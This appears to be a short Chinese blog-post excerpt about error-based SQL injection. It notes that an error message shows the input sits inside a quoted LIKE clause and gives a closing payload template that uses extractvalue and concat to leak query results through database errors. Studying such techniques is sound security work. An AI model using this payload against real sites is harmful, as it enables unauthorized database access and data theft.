摘要: 1、证明存在sql注入,根据这个报错语句,,有' 有% 2、payload 闭合语句 %' or (select extractvalue("anything",concat('~',( sql语句)))) or title like '% 1 阅读全文
posted @ 2021-03-09 09:29 尛①麵 阅读(272) 评论(0) 推荐(0) 编辑